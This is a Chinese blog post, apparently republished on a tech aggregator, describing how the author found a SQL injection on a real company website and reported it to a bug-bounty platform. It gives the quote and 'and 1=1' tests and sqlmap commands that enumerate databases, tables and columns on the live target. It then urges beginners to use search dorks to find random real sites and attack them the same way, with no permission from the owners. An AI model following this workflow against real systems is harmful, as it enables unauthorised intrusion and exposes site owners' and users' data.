IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> sql注入漏洞搜寻,记一次sql注入高危漏洞 -> 正文阅读

[PHP知识库]sql注入漏洞搜寻,记一次sql注入高危漏洞

前言:

学了sql注入咋找漏洞呢?只会靶场的sql注入咋办呢?实战的sqlmap就是显示参数不可注入跑不出来,这sql注入到底还存不存在网络上呢?还是我的sqlmap不会用呢?

这些一定是入门的小白对sql注入的一些疑问吧,这篇文章,先展示sql注入的发现,然后是sqlmap的实战使用,最后再讲讲一些我目前的经验,绝对能让小白脱离sql注入靶场,从而投入实战中

1、发现过程

直接一个单引号插后边,看到没,报错了

为了进一步验证,然后加熟悉的and 1=1 ,and 1=2,前者插入正常,后者异常

2、然后还用问吗?直接丢sqlmap跑,先采用最原始的命令验证sql注入的存在,跑出来了,就获取库,表,字段吧

(1)python sqlmap.py -u".......php?id=356"? ? ? ? ? ? ? ? 验证sql注入

(2)python sqlmap.py -u".......php?id=356" -dbms mysql -dbs? ? ? ? ?获取库

(3)python sqlmap.py -u"......php?id=356" -dbms mysql -D 库名?-tables? ? ? ? ?获取表

?

(4)python sqlmap.py -u"......php?id=356" -dbms mysql -D 库名 -T 表名 -columns,到获取字段这一步即可,不要查看字段下的数据,否则就是违法

?3、最后就交补天了,资产为几百万的小公司而已,这个sql注入可导致他的所有数据泄露,包括数据库连接用户名密码

4、经验总结

(1)小白把一些常规的web靶场如pikachu,dvwa,xss-labs,sql-labs练过后(个人没练完,只是针对性挑着练,怎么针对法,可以评论区问我),就找实战,用上特定搜索法,比如inurl:php?id=31等找sql注入等,这种搜索技巧其他文章有,找找就行,我这里就不啰嗦了,然后你按我上述流程,二十来个找一个还是行的

(2)关于sqlmap的用法,我把我自己整理的方法放出来

(链接:https://pan.baidu.com/s/1ixFaEMhSKA21algws2MXZA?提取码:6666?
--来自百度网盘超级会员V1的分享)

先拿sqlmap对着靶场把常用指令和sqlmap注入流程熟悉一下,再拿去实战,不然实战中的sqlmap使用的会让你怀疑人生,一堆红色警告,然后跑大半天了还告诉你参数不可注入

(3)关于有什么学习路上的疑问,可评论区留下,我会回答

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-03-12 17:13:32  更:2022-03-12 17:13:40 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/26 16:31:44-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计